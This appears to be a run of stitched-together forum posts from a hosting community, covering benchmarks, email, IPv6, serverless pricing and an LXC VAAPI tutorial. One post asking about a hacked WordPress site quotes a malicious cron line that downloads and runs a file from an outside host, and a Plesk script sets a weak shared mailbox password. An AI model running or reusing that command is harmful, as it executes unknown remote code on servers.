Welcome to OCD Benchmarking Thread

When sharing/posting YABS results, please use the proper code tag/formatting (``) just so that the results are displayed neatly.

In addition to the above, it would be very much appreciated if you were to include details such as the Provider, Plan, Location and Price. Other details like date of purchase can be included as well, or just indicate if it's a deal bought on a special occasion, i.e., Black Friday, Cyber Monday, Independence Day etc.

If you're posting results of a custom built machine, or something locally of your own, it would be nice if you could share details of your build and/or hardware - just to serve as an "FYI" for the community members.

Here's an example of the format you can use to share your YABS results:

# ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## #
#              Yet-Another-Bench-Script              #
#                     v2022-06-11                    #
# https://github.com/masonr/yet-another-bench-script #
# ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## #

Mon 04 Jul 2022 04:28:07 PM EDT

Basic System Information:
---------------------------------
Uptime     : 0 days, 0 hours, 6 minutes
Processor  : Intel(R) Xeon(R) Gold 5315Y CPU @ 3.20GHz
CPU cores  : 1 @ 3199.998 MHz
AES-NI     : ✔ Enabled
VM-x/AMD-V : ✔ Enabled
RAM        : 1.9 GiB
Swap       : 975.0 MiB
Disk       : 28.4 GiB
Distro     : Debian GNU/Linux 11 (bullseye)
Kernel     : 5.10.0-15-amd64

fio Disk Speed Tests (Mixed R/W 50/50):
---------------------------------
Block Size | 4k            (IOPS) | 64k           (IOPS)
  ------   | ---            ----  | ----           ----
Read       | 264.91 MB/s  (66.2k) | 3.46 GB/s    (54.1k)
Write      | 265.61 MB/s  (66.4k) | 3.48 GB/s    (54.4k)
Total      | 530.52 MB/s (132.6k) | 6.95 GB/s   (108.6k)
           |                      |
Block Size | 512k          (IOPS) | 1m            (IOPS)
  ------   | ---            ----  | ----           ----
Read       | 9.32 GB/s    (18.2k) | 7.95 GB/s     (7.7k)
Write      | 9.82 GB/s    (19.1k) | 8.48 GB/s     (8.2k)
Total      | 19.15 GB/s   (37.4k) | 16.44 GB/s   (16.0k)

iperf3 Network Speed Tests (IPv4):
---------------------------------
Provider        | Location (Link)           | Send Speed      | Recv Speed
                |                           |                 |
Clouvider       | London, UK (10G)          | 828 Mbits/sec   | 469 Mbits/sec
Online.net      | Paris, FR (10G)           | 882 Mbits/sec   | 262 Mbits/sec
Hybula          | The Netherlands (40G)     | 882 Mbits/sec   | 823 Mbits/sec
Uztelecom       | Tashkent, UZ (10G)        | 577 Mbits/sec   | 307 Mbits/sec
Clouvider       | NYC, NY, US (10G)         | 940 Mbits/sec   | 939 Mbits/sec
Clouvider       | Dallas, TX, US (10G)      | 746 Mbits/sec   | 155 Mbits/sec
Clouvider       | Los Angeles, CA, US (10G) | 796 Mbits/sec   | 619 Mbits/sec

iperf3 Network Speed Tests (IPv6):
---------------------------------
Provider        | Location (Link)           | Send Speed      | Recv Speed
                |                           |                 |
Clouvider       | London, UK (10G)          | 705 Mbits/sec   | 435 Mbits/sec
Online.net      | Paris, FR (10G)           | 823 Mbits/sec   | 431 Mbits/sec
Hybula          | The Netherlands (40G)     | 714 Mbits/sec   | 725 Mbits/sec
Uztelecom       | Tashkent, UZ (10G)        | 676 Mbits/sec   | 410 Mbits/sec
Clouvider       | NYC, NY, US (10G)         | 926 Mbits/sec   | 926 Mbits/sec
Clouvider       | Dallas, TX, US (10G)      | 904 Mbits/sec   | 775 Mbits/sec
Clouvider       | Los Angeles, CA, US (10G) | 885 Mbits/sec   | 632 Mbits/sec

Geekbench 5 Benchmark Test:
---------------------------------
Test            | Value
                |
Single Core     | 1036
Multi Core      | 1005
Full Test       | https://browser.geekbench.com/v5/cpu/15825267

Thank you and happy YABS-ing!

All the websites from bikegremlin.com domain (bike.bikegremlin.com, io.bikegremlin.com etc.) are gone from Bing's SERP starting from June 26th 2022. Zero, zilch.

DuckDuckGo does the same, while Google and Yandex show all the pages normaly in their serches.

Bing's dashboard shows no errors (robots, page test, live URL test etc.), except for the Site Scan. Site scan returns "Error 400-499".

Full report that I'll update if I get any more ideas, or hear from Bing's support:

Microsoft Bing – site gone from SERP overnight!

If anyone has any ideas to try, I'm all ears.

Traffic is very low right now - since it's just me developing the project.

Is this something a low end box can handle for the time being? I don't want to be a noisy neighbor.

I don't expect to need to transcode beyond 1080p (having the option for 4k would be nice, but far from essential), and we're talking 2 simultaneous streams maximum. Storage wise, I have a bunch of big desktop drives knocking about I can use, but I'm not opposed to using a suitably powerful NAS either.

Noise/heat isn't too much of an issue as this will go in my office, but I would prefer something that's not too noisy.

I'm looking to spend about £300-£400, could stretch to £500 if I get some extra bells and whistles.

Does anyone have their own builds they could share or suggestions for suitable hardware that's reasonably easy to purchase?

# wg-quick up wg0
[#] ip link add wg0 type wireguard
RTNETLINK answers: Operation not supported
Unable to access interface: Protocol not supported
[#] ip link delete dev wg0
Cannot find device "wg0"

Is it impossible to run wireguard in these containers or is it a PEBKAC issue? Do you recommend any of the userspace wireguard implementations and, if so, which?

What's it about?

Consider these 4 domains:

• example.com
• news.example.com
• pigeons.com
• gmail.com

Say I configure all the domains' SPF DMARC and DKIM properly (gmail.com is already configured by Google). OK?

And say I use news.example com for sending emails.
From email is like: info@news.example.com

If I don't configure/change the reply-to email, it's all good.

But, what about these scenarios:

1)
What happens if I configre a reply-to email to be:
relja@example.com (so, I'm using the "root" domain for the reply-to address)?
Does this increase the chances of my email getting to the spam-box?

2)
The same question for using relja@pigeons.com (properly configured, but completely different domain).

3)
Finally, if I set the reply-to to be relja@gmail.com - for that I'm sure it would trigger some spam filters (correct me if I'm wrong).

If 1) is OK, it could save me some time configuring stuff.
If 2) is good as well, it could save me hours, if not more.
3) is most probably a bad idea - but I'd appreciate a confirmation.

Here's the post:
https://vitobotta.com/2022/07/26/how-to-host-email-for-custom-domains-for-free-or-almost-free/

I'm looking for a way to send mass emails to paying customers (notifications, re-schedules etc.).
So no email marketing nonsense.

Volume used right now is 500 emails per hour.
I'd prefer to be able to send up to 1,000 per hour, but 500 is not a deal breaker.

Monthly volume is up to 500,000 emails (usually under half of that).

API option (to make the application create a list based on criteria and send it to the service, having the service then worry about delivery, during the following hours).

Urgency is not crucial, transactional emails are handled separately.
This is for notifications that should arrive within the first day or two since they are sent (preferably on the same day).

Budget?
As low as possible to allow for a decent quality stable service.
Sendgrid ask for about $90 for 200K per month, with a dedicated IP.
Wouldn't mind paying less, but if it costs more - then it costs more, what can you do?

Sendgrid service is something I'd avoid based on my recent experience.

Can anyone recommend a decent solution?

EDIT:
I forgot to note this:
I'd like for the business employees to be able to send an email to a pre-defined list, and be allowed to edit the from email (keeping the same domain, but different account).
That's for the manually sent mass notifications.

Sure, one could develop an app for that too, but it would be nice if one doesn't have to.

All bad:

• Unreliable provider - check
• Several sites on one cPanel - check
• WordPress without updates and any hardening - check

And yes, it's a friend I can't say no to.

Now, my first (and only so far) question is:

Can this cron job be added to cPanel through WordPress, or does it mean the whole cPanel account has been compromised (if that can be answered just from this info)?

wget -q -O xxxd http:// hello. hellodolly666. xyz/xxxd && chmod 0755 xxxd && /bin/sh xxxd /home/corleoneaccount/public_html/corleone_site 24 && rm -f xxxd

---------------------------------------------------------------------------   
OS           : CentOS 7.7.1908 (64 Bit)
 Virt/Kernel  : KVM / 5.4.5-1.el7.elrepo.x86_64
 CPU Model    : AMD Ryzen 7 3700X 8-Core Processor
 CPU Cores    : 2 @ 3593.248 MHz x86_64 512 KB Cache
 CPU Flags    : AES-NI Enabled & VM-x/AMD-V Disabled
 Load Average : 0.00, 0.00, 0.00
 Total Space  : 18G (13G ~67% used)
 Total RAM    : 1990 MB (679 MB + 912 MB Buff in use)
 Total SWAP   : 2047 MB (0 MB in use)
 Uptime       : 11 days 7:18
---------------------------------------------------------------------------
 ASN & ISP    : AS24940, Hetzner Online GmbH
 Organization :
 Location     : Falkenstein, Germany / DE
 Region       : Saxony
---------------------------------------------------------------------------

 ## Geekbench v4 CPU Benchmark:

  Single Core : 5170  (EXCELLENT)
   Multi Core : 9023

 ## IO Test

 CPU Speed:
    bzip2     : 136 MB/s
   sha256     :   1.4 GB/s
   md5sum     : 658 MB/s

 RAM Speed:
   Avg. write : 3072.0 MB/s
   Avg. read  : 8908.8 MB/s

 Disk Speed:
   1st run    : 1.7 GB/s
   2nd run    : 2.4 GB/s
   3rd run    : 2.4 GB/s
   -----------------------
   Average    : 2218.7 MB/s

 ## Global Speedtest

 Location                       Upload           Download         Ping
---------------------------------------------------------------------------
 Speedtest.net                  901.30 Mbit/s    878.05 Mbit/s    3.25 ms
 USA, New York (AT&T)           144.94 Mbit/s    125.09 Mbit/s   103.261 ms
 USA, Chicago (Windstream)      187.46 Mbit/s    110.34 Mbit/s   101.268 ms
 USA, Dallas (Frontier)         152.66 Mbit/s    168.53 Mbit/s   124.391 ms
 USA, Miami (Frontier)          168.47 Mbit/s    161.24 Mbit/s   113.602 ms
 USA, Los Angeles (Spectrum)    131.42 Mbit/s    148.38 Mbit/s   151.154 ms
 UK, London (Community Fibre)   580.25 Mbit/s    536.88 Mbit/s    19.524 ms
 France, Lyon (SFR)             510.47 Mbit/s    343.03 Mbit/s    19.664 ms
 Germany, Berlin (DNS:NET)      595.07 Mbit/s    649.75 Mbit/s    18.254 ms
 Spain, Madrid (MasMovil)       470.36 Mbit/s    508.52 Mbit/s    29.368 ms
 Italy, Rome (Unidata)          350.80 Mbit/s    363.33 Mbit/s    47.221 ms
 Israel, Haifa (013Netvision)   284.63 Mbit/s    292.39 Mbit/s    58.202 ms
 India, New Delhi (GIGATEL)     136.84 Mbit/s    285.17 Mbit/s   132.552 ms
 Singapore (FirstMedia)         39.11 Mbit/s     36.78 Mbit/s    170.950 ms
 Japan, Tsukuba (SoftEther)     18.34 Mbit/s     60.18 Mbit/s    250.445 ms
 Australia, Sydney (Yes Optus)  19.22 Mbit/s     16.35 Mbit/s    291.932 ms
 RSA, Randburg (Cool Ideas)     84.76 Mbit/s     219.46 Mbit/s   188.881 ms
 Brazil, Sao Paulo (Criare)     79.18 Mbit/s     206.16 Mbit/s   192.480 ms
---------------------------------------------------------------------------

 Finished in : 9 min 16 sec

Focus here is mostly on low usage in the context of free tiers ala cheapskate. API is consumer facing so can't have second long cold starts.

TLDR: GCP wins for my specific usage case (avoid cold starts, full featured execution env). Honourable mention to Cloudflare workers and AWS Lambda for some intriguing aspects.

Please do forgive the fairly low quality stream of thought write-up.

Google Cloud

Most familiar with this and has an idle billing tier, so focused on this more than rest.

I've been using python, but will change this since I discovered lang choice matters.

Go vs Python, trivial hello world stuff, gen2 128mb sizing. Execution time looks about the same. The memory utilization on the other hand 12mb Go, 70mb Python. Given that sizing of these functions starts at 128mb...that 70mb for a python hello world is definitely notable.

Then there is the cold start issue. I've had significant issues with this in the past, so the new min instance mechanism to keep them warm seems basically compulsory.

Long story short it costs ~1USD to keep a function warm per function. Of which free tier absorbs about 0.9 functions...so basically you get one free and each subsequent warm one it a dollar.

Gen 2 also has better concurrency support, however there is a major gotcha hidden in the documentation:

For preview, this will only be supported by .NET, Java, Node.js, and Go runtimes, for functions with 1 or more vCPUs.

Note specifically the 1 vcpu...not obvious in LES context, but that's not bottom end - 0.083 is...so 1vcpu is a fairly chunky sizing which basically means ~$8 min a month. No concurrency means two simultaneous request need more than 1 instance...back to cold starts even with 1 min to keep it warm. I suppose you could keep two warm, which given <10m execution time means chances of a cold start are near zero. Even one may be an acceptable risk though. Alternatively one could keep one artificially warm via timer but that's quite janky.

Does provide a strong incentive to pack as much stuff into one omnibus function though, which goes against the conceptual simple connector/glue type thinking that functions originally were.

Digital Ocean

Free allowance tier looks meh, and chatter suggests cold starts are an unsolved problem. Not seeing anything suggesting this is even worth trying

Cloudflare

Technically this solution is vastly superior to the rest. No cold starts, easy integration with KV storage, global distribution.

The major gotcha is the incredibly limited execution environment (basically JS), super short execution time maximums and the pricing model. It doesn't scale up gradually like GCP...once you start hitting limits you're on paid plan ($5).

Oracle

Very odd...they'll give you ~6 free VMs and 24GB mem forever on an unpaid account. Very generous. Cloud function? Nope...nada...nothing without a credit card. There is a free allowance...but you can't get it without a card. Free allowance looks like the same 400k gb/s everyone else is offering too. meh.

Alibaba Cloud

Looks to cover about ~1 function continuous running in free allowance. But the per GB/s pricing outside of that is like 6x GCP. And I don't see mention of a min number of instances so not sure if avoiding cold starts is even possible. Overall doesn't look attractive.

Azure

Very confusing pricing. e.g. for consumption model it mentions it bills by vcpu/s but doesn't list the price. If similar to premium model then its crazy expensive. Nope....

AWS

Looks cheaper compared to rest on a GB/s basis and billing is 1ms not 100ms like the rest. Also require keeping functions warm so ends up in similar territory to GCP...basically 1 free warm function. Unlike GCP there is no idle price tier though...so ends up being substantially more expensive for subsequent ones if you want to keep a function warm all month (~4.5 USD). For usage cases where cold starts are acceptable AWS looks excellently priced though.

some of you may know me from LEB as "fLoo". I'm running the public speedtest server "speedtest.wtnet.de". We've successfully upgraded it to 40 Gbit. It is located near Hamburg/Germany. I'd be happy to hear results from you to improve on them.

https://speedtest.wtnet.de

Thanks for your time!

Florian

my collection of digital media files grew exponentially during the Covid-19 pandemic. I have a rented server with 4x10 GB spinning disks in RAID-10 (= 20 usable TB in total) and the array is already filled with over 10 TB. I expect to hit the full 20 TB in some months time, but this will then also be the maximum storage, that I will need.

However, the server is not horribly expensive, but also not a bargain with monthly payments around EUR 90,00. I wonder whether it would make sense to have the data at home instead. I have a home internet connection with 100 Mbit upload capacity, so even hosting my data at home for access on the go could be an option.

What would be your choice for the job? A NAS? Something else? I have no idea what the current "state of the art" solution is. It is important to me to at least have the data in a RAID-1 array. No Raid or Raid-0 is not an option. I know that a Raid Array is no replacement for backups, but it would let me sleep better anyhow. A NAS would be my first idea, but I saw that they are not cheap and I wonder whether going on renting the server (with free hardware replacements) isn't the better choice in the end...

Thank you very much in advance for your ideas and suggestions!

Stay negative or at least keep it mild & kind regards
Amitz

What I want to reach is to make IPv6 work in my home network and I tried several ways to make the tunnel working, but both do not work.

First approach: using NAT IP (192.168.88.1)
[admin@MikroTik] > /interface 6to4 add comment="Route48.org Tunnel Broker (DE)" disabled=no local-address=192.168.88.1 mtu=1280 name=sit1 remote-address=194.50.X.X [admin@MikroTik] > /ipv6 route add comment="" disabled=no distance=1 dst-address=::/0 gateway=2a06:a003:XXXX::1 scope=30 target-scope=10 [admin@MikroTik] > /ipv6 address add address=2a06:a003:XXXX::2/48 advertise=no disabled=no eui-64=no interface=sit1

Second approach: using carrier router IP (192.168.1.6):
[admin@MikroTik] > /interface 6to4 add comment="Route48.org Tunnel Broker (DE)" disabled=no local-address=192.168.1.6 mtu=1280 name=sit1 remote-address=194.50.X.X [admin@MikroTik] > /ipv6 route add comment="" disabled=no distance=1 dst-address=::/0 gateway=2a06:a003:XXXX::1 scope=30 target-scope=10 [admin@MikroTik] > /ipv6 address add address=2a06:a003:XXXX::2/48 advertise=no disabled=no eui-64=no interface=sit1

I also tried to forward all ports to Mikrotik and use my public IPv4, but it didn't work neither...

After any try, I tried to ping Cloudflare IPv6 DNS, but there are timeouts...
[admin@MikroTik] > ping 2606:4700:4700::1111 SEQ HOST SIZE TTL TIME STATUS 0 2606:4700:4700::1111 timeout 1 2606:4700:4700::1111 timeout 2 2606:4700:4700::1111 timeout 3 2001:470:71:74b:: 104 64 95ms158us address unreachable

What am I doing wrong in my config? Tunnel does not work neither with Route48 nor HE.

MXroute doesn't seem to have a similar feature, so I'm looking for a replacement. I'd prefer a self-hosted solution and I'm looking into getmail which seems to do the trick but requires a local MTA and forwards the emails via SMTP.

Do you know about any other, more simple options?

Part1

https://www.igorslab.de/en/power-supply-insanity-connector-chaos-and-transient-drama-when-pure-waste-of-resources-gets-elevated-to-the-new-standard/

Part 2
https://www.igorslab.de/en/power-supply-insanity-connector-chaos-and-transient-drama-when-pure-waste-of-resources-gets-elevated-to-the-new-standard/2/

https://www.nginx.com/blog/improving-nginx-performance-with-kernel-tls/

i recall very few using that, probably anynode before they sold it off.

Usually tutorials are about plain installation or standard Docker, but I really like Dokku.
In the post I am also using Wasabi (any s3 compatible service will do) as primary storage instead of local storage. So I can store any amounts of data for cheap.

Thoughts? Do you use Nextcloud? If yes, how do you self host it?

I found this could be helpful for many people looking to create multiple Plesk email accounts especially since we are getting a lot of migrations from the old Google Gsuite Legacy edition.

The script reuires a txt file where the emails must be listed 1 per line :

#!/bin/bash
while read user
do
plesk bin mail --create $user -passwd 12345@@ -mbox_quota 25000M -mailbox true
done < userfile.txt

The script may fail if your secuity standards for your passwords are too high so you may edit that 12345
@ if needed.

By default i have aligned this at 15000M or 15G to equal Legacy Google Workspace accounts.

I hope this helps

Background

I recently bought a DELL OptiPlex 7040 Micro desktop computer and wanted to operate it as a dedicated server.
I installed Debian 11 on the computer, and placed it into the closet to be accessed over SSH only.
To keep the host machine stable, I decide to run most workloads in LXC containers, which are said to be Fast-as-Metal.
Since I operate my own video streaming website, I have an LXC container for encoding the videos.

The computer comes with an Intel Core i5-6500T processor.
It has 4 hardware cores running at 2.50GHz frequency, and belongs to the Skylake family.
FFmpeg is happily encoding my videos on this CPU.

As I read through the processor specification, I noticed this section:

• Processor Graphics: Intel® HD Graphics 530

  • Processor Graphics indicates graphics processing circuitry integrated into the processor, providing the graphics, compute, media, and display capabilities.

• Intel® Quick Sync Video: Yes

  • Intel® Quick Sync Video delivers fast conversion of video for portable media players, online sharing, and video editing and authoring.

It seems that I have a GPU!
Can I make use of this Intel GPU and accelerate video encoding workloads?

Story

If you just want the solution, skip to the TL;DR Steps to Enable VAAPI in LXC section at the end.

Testing VAAPI with Docker

I read FFmpeg HWAccelIntro and QuickSync pages, and learned:

• FFmpeg supports hardware acceleration on various GPU brands including Intel, AMD, and NVIDIA.
• Hardware encoders typically generate outputs of significantly lower quality than good software encoders, but are generally faster and do not use much CPU resource.

• On Linux, FFmpeg may access Intel GPU through libmfx, OpenCL, or VAAPI.
  Among these, encoding is possible with libmfx or VAAPI.

• Each generation Intel processors has different video encoding capabilities.
  For the Skylake family that I have, the integrated GPU can encode to H.264, MPEG-2, VP8, and H.265 formats.

I decided to experiment with VAAPI, because it has the shortest name 🤪.
I quickly found jrottenberg/ffmpeg Docker image.
Following the example commands on FFmpeg VAAPI page, I verified that my GPU can successfully encode videos to H264 format:

docker run \
    --device /dev/dri \
    -v $(pwd):/data -w /data \
  jrottenberg/ffmpeg:4.1-vaapi \
    -loglevel info -stats \
    -vaapi_device /dev/dri/renderD128 \
    -i input.mov \
    -vf 'hwupload,scale_vaapi=w=640:h=480:format=nv12' \
    -preset ultrafast \
    -c:v h264_vaapi \
    -f mp4 output.mp4

The renderD128 Device

This above docker run command tells me that the /dev/dri/renderD128 device is likely the key of getting Intel GPU to work in an LXC container.
It is a character device with major number 226 and minor number 128.

sunny@sunnyD:~$ ls -l /dev/dri
total 0
drwxr-xr-x 2 root root         80 Jan 22 11:04 by-path
crw-rw---- 1 root video  226,   0 Jan 22 11:04 card0
crw-rw---- 1 root render 226, 128 Jan 22 11:04 renderD128

Inside the container, this device does not exist.
Naively, I tried mknod, but it returns an "operation not permitted" error:

ubuntu@video:~$ ls -l /dev/dri
ls: cannot access '/dev/dri': No such file or directory

ubuntu@video:~$ sudo mkdir /dev/dri

ubuntu@video:~$ sudo mknod /dev/dri/renderD128 c 226 128
mknod: /dev/dri/renderD128: Operation not permitted

I searched for this problem over several weeks, found several articles regarding how to get Plex or Emby media server to use VAAPI hardware encoding from LXC containers, but they are either using Proxmox or LXD (unavailable on Debian), both differ from the plain LXC that I'm trying to use.
From these articles, I gathered enough hints on what's needed:

• LXC container cannot mknod arbitrary devices for security reasons.

• To have a device inode in an LXC container, the container config must:

  • grant permission with lxc.cgroup.devices.allow directive, and
  • mount the device with lxc.mount.entry directory.

• In addition to ffmpeg, it's necessary to install vainfo i965-va-driver packages (available on both Debian and Ubuntu).

nobody:nogroup

With these configs in place, the device showed up in the container, but it does not work:

ubuntu@video:~$ ls -l /dev/dri
total 0
crw-rw---- 1 nobody nogroup 226, 128 Jan 22 16:04 renderD128
ubuntu@video:~$ vainfo
error: can't connect to X server!
error: failed to initialize display
ubuntu@video:~$ sudo vainfo
error: XDG_RUNTIME_DIR not set in the environment.
error: can't connect to X server!
error: failed to initialize display

One suspicious thing is the nobody:nogroup owner on the renderD128 device.
It differs from the root:render owner as seen on the host machine.
Naively, I tried chown, but it returns an "invalid argument" error and has no effect:

ubuntu@video:~$ sudo chown root:render /dev/dri/renderD128
chown: changing ownership of '/dev/dri/renderD128': Invalid argument

ubuntu@video:~$ ls -l /dev/dri
total 0
crw-rw---- 1 nobody nogroup 226, 128 Jan 22 16:04 renderD128

A Reddit post claims that running chmod 0666 /dev/dri/renderD128 from the host machine would solve this problem.
I gave it a try and it was indeed effective.
However, I know this isn't a proper solution because you are not supposed to change permission on device inodes.
So I continued searching.

idmap

The last piece of the puzzle lies in user and group ID mappings.
In an unprivileged LXC container, user and group IDs are shifted, so that the root user (UID 0) inside the container would not gain root privilege on the host machine.
lxc.idmap directive in the container config controls these mappings.
In my container, the relevant config was:

# map container UID 0~65535 to host UID 100000~165535
lxc.idmap = u 0 100000 65536
# map container GID 0~65535 to host GID 100000~165535
lxc.idmap = g 0 100000 65536

Notably, the root user (UID 0) and render group (GID 107) on the host user aren't mapped to anything in the container.
The kernel uses 65534 to represent a UID/GID which is outside the container's map.
Hence, the renderD128 device, when mounted into the container, has owner UID and GID being 65534:

ubuntu@video:~$ ls -ln /dev/dri
total 0
crw-rw---- 1 65534 65534 226, 128 Jan 22 16:04 renderD128

65534 is the UID of nobody and the GID of nogroup, which is why this device appears to be owned by nobody:nogroup.

To make the renderD128 owned by render group, the correct solution is mapping the render group inside the container to the render group on the host.
This, in turn, requires two ingredients:

• /etc/subgid must authorize the host user who starts the container to map the GID of the host's render group into child namespaces.
• The container config should have an lxc.idmap directive that maps the GID of the container's render group to the GID of the host's render group.

So I added lxc:107:1 to /etc/subgid, in which lxc is the ordinary user on the host machine that starts the containers, and 107 is the GID of render group on the host machine.
Then I modified the container config as:

# map container UID 0-65535 to host UID 100000-165535
lxc.idmap = u 0 100000 65536
# map container GID 0-65535 to host GID 100000-165535
lxc.idmap = g 0 100000 65536
# map container GID 109 to host GID 107
lxc.idmap = g 109 107 1

However, the container fails to start:

lxc@sunnyD:~$ lxc-unpriv-start -F video
Running scope as unit: run-r611f1778b87645918a2255d44073b86b.scope
lxc-start: video: conf.c: lxc_map_ids: 2865 newgidmap failed to write mapping "newgidmap: write to gid_map failed: Invalid argument": newgidmap 5297 0 100000 65536 109 107 1
             lxc-start: video: start.c: lxc_spawn: 1726 Failed to set up id mapping.

Re-reading user_namespaces(7) manpage reveals the reason:

Defining user and group ID mappings: writing to uid_map and gid_map

• The range of user IDs (group IDs) specified in each line cannot overlap with the ranges in any other lines.

The above container config defines two group ID mappings that overlaps at the GID 109, which causes the failure.
Instead, it must be split to three ranges: 0-108 mapped to 100000-100108, 109 mapped to 107, 110-65535 mapped to 100110-165535.

Another idea I had, changing the GID of the render group to a large number greater than 65535 and thus dodge the overlap, turns out to be a bad idea, as it causes an error during system upgrades:

ubuntu@video:~$ sudo apt full-upgrade
Setting up udev (245.4-4ubuntu3.15) ...
The group `render' already exists and is not a system group. Exiting.
dpkg: error processing package udev (--configure):
 installed udev package post-installation script subprocess returned error exit status 1

Hence, I must carefully calculate the GID ranges and write three GID mapping entries.
With this final piece in place, success!

ubuntu@video:~$ vainfo 2>/dev/null | head -10
vainfo: VA-API version: 1.7 (libva 2.6.0)
vainfo: Driver version: Intel i965 driver for Intel(R) Skylake - 2.4.0
vainfo: Supported profile and entrypoints
      VAProfileMPEG2Simple            : VAEntrypointVLD
      VAProfileMPEG2Simple            : VAEntrypointEncSlice
      VAProfileMPEG2Main              : VAEntrypointVLD
      VAProfileMPEG2Main              : VAEntrypointEncSlice
      VAProfileH264ConstrainedBaseline: VAEntrypointVLD
      VAProfileH264ConstrainedBaseline: VAEntrypointEncSlice
      VAProfileH264ConstrainedBaseline: VAEntrypointEncSliceLP

Encoding speed comparison on one of my videos:

• h264, ultrafast, 640x480 resolution

• Intel GPU VAAPI encoding:

  frame= 2900 fps=201 q=-0.0 Lsize=   18208kB time=00:01:36.78 bitrate=1541.2kbits/s speed=6.71x
  video:16583kB audio:1528kB subtitle:0kB other streams:0kB global headers:0kB muxing overhead: 0.533910%
  

• Skylake CPU encoding:

  frame= 2900 fps=171 q=-1.0 Lsize=   18786kB time=00:01:36.78 bitrate=1590.1kbits/s speed=5.71x
  video:17177kB audio:1528kB subtitle:0kB other streams:0kB global headers:0kB muxing overhead: 0.434900%
  

• GPU encoding was 17.5% faster than CPU encoding.

TL;DR Steps to Enable VAAPI in LXC

1. Confirm that the /dev/dri/renderD128 device exists on the host machine.

   lxc@sunnyD:~$ ls -l /dev/dri/renderD128
   crw-rw---- 1 root render 226, 128 Jan 22 11:04 /dev/dri/renderD128
   

   If the device does not exist, you do not have an Intel GPU or it is not recognized by the kernel.
   You must resolve this issue before proceeding to the next step.

2. Find the GID of the render group on the host machine:

   lxc@sunnyD:~$ getent group render
   render:x:107:
   

   On my computer, the GID is 107.

3. Authorize the host user who starts LXC containers to map the GID to child namespaces.

   1. Run sudoedit /etc/subgid to open the editor.

   2. Append a line:

      lxc:107:1
      

   Explanation:

   • lxc refers to the host user account.
   • 107 is the GID of the render group, as seen in step 2.
   • 1 means authorizing just one GID.

4. Create and start an LXC container, and find out the GID of the container's render group.
   I'm using a Ubuntu 20.04 template, but the same procedure is applicable to other templates.

   lxc@sunnyD:~$ export DOWNLOAD_KEYSERVER=keyserver.ubuntu.com
   
   lxc@sunnyD:~$ lxc-create -n video -t download -- -d ubuntu -r focal -a amd64
   Using image from local cache
   Unpacking the rootfs
   
   You just created an Ubuntu focal amd64 (20211228_07:42) container.
   
   To enable SSH, run: apt install openssh-server
   No default root or user password are set by LXC.
   
   lxc@sunnyD:~$ lxc-unpriv-start video
   Running scope as unit: run-re7a88541bd5d42ab92c9ea6d4cd2a19f.scope
   
   lxc@sunnyD:~$ lxc-unpriv-attach video getent group render
   Running scope as unit: run-reaad3e4a549a420bacb160fd8cbc87a8.scope
   render:x:109:
   

5. Edit the container config.

   1. Run editor ~/.local/share/lxc/video/config to open the editor.

   2. Delete existing lines that start with lxc.idmap = g.

      However, do not delete lines that start with lxc.idmap = u.

   3. Append these lines:

      lxc.idmap = g 0 100000 109
      lxc.idmap = g 109 107 1
      lxc.idmap = g 110 100110 65426
      lxc.cgroup.devices.allow = c 226:128 rwm
      lxc.mount.entry = /dev/dri/renderD128 dev/dri/renderD128 none bind,optional,create=file
      

   Explanation:

   • The lxc.idmap = g directive defines a group ID mapping.

     • 109 is the GID of the container's render group, as seen instep 4.
     • 107 is the GID of the host's render group, as seen in step 2.

   • The lxc.cgroup.devices.allow directive exposes a device to the container.

     • 226:127 is the major number and minor number of the renderD128 device, as seen in step 1.

   • The lxc.mount.entry directive mounts the host's renderD128 device into the container.

   You may use this handy idmap calculator to generate the lxc.idmap directives:
   (read original article https://yoursunny.com/t/2022/lxc-vaapi/ to use the JavaScript calculator)

6. Restart the container and attach to its console.

   lxc@sunnyD:~$ lxc-stop video
   
   lxc@sunnyD:~$ lxc-unpriv-start video
   Running scope as unit: run-r77f46b8ba5b24254a99c1ef9cb6384c3.scope
   
   lxc@sunnyD:~$ lxc-unpriv-attach video
   Running scope as unit: run-r11cf863c81e74fcfa1615e89902b1284.scope
   

7. Install FFmpeg and VAAPI packages in the container.

   root@video:/# apt update
   
   root@video:/# apt install --no-install-recommends ffmpeg vainfo i965-va-driver
   0 upgraded, 148 newly installed, 0 to remove and 15 not upgraded.
   Need to get 79.2 MB of archives.
   After this operation, 583 MB of additional disk space will be used.
   Do you want to continue? [Y/n]
   

8. Confirm that the /dev/dri/renderD128 device exists in the container and is owned by render group.

   root@video:/# ls -l /dev/dri/renderD128
   crw-rw---- 1 nobody render 226, 128 Jan 22 16:04 /dev/dri/renderD128
   

   It's normal for the owner user to show as nobody.
   This does not affect operation as long as the calling user is a member of the render group.
   The only implication is that, the container's root user cannot access the renderD128 unless it is added to the render group.

9. Add container's user account(s) to render group.
   These users will have access to the GPU.

   root@video:/# /sbin/adduser ubuntu render
   Adding user `ubuntu' to group `render' ...
   Adding user ubuntu to group render
   Done.
   

10. Become one of these users, and verify the Intel iGPU is operational in the LXC container.

    root@video:/# sudo -iu ubuntu
    
    ubuntu@video:~$ vainfo
    error: XDG_RUNTIME_DIR not set in the environment.
    error: can't connect to X server!
    libva info: VA-API version 1.7.0
    libva info: Trying to open /usr/lib/x86_64-linux-gnu/dri/iHD_drv_video.so
    libva info: va_openDriver() returns -1
    libva info: Trying to open /usr/lib/x86_64-linux-gnu/dri/i965_drv_video.so
    libva info: Found init function __vaDriverInit_1_6
    libva info: va_openDriver() returns 0
    vainfo: VA-API version: 1.7 (libva 2.6.0)
    vainfo: Driver version: Intel i965 driver for Intel(R) Skylake - 2.4.0
    vainfo: Supported profile and entrypoints
          VAProfileMPEG2Simple            : VAEntrypointVLD
          VAProfileMPEG2Simple            : VAEntrypointEncSlice
          VAProfileMPEG2Main              : VAEntrypointVLD
          VAProfileMPEG2Main              : VAEntrypointEncSlice
          VAProfileH264ConstrainedBaseline: VAEntrypointVLD
          VAProfileH264ConstrainedBaseline: VAEntrypointEncSlice
          VAProfileH264ConstrainedBaseline: VAEntrypointEncSliceLP
          VAProfileH264ConstrainedBaseline: VAEntrypointFEI
          VAProfileH264ConstrainedBaseline: VAEntrypointStats
          VAProfileH264Main               : VAEntrypointVLD
          VAProfileH264Main               : VAEntrypointEncSlice
          VAProfileH264Main               : VAEntrypointEncSliceLP
          VAProfileH264Main               : VAEntrypointFEI
          VAProfileH264Main               : VAEntrypointStats
          VAProfileH264High               : VAEntrypointVLD
          VAProfileH264High               : VAEntrypointEncSlice
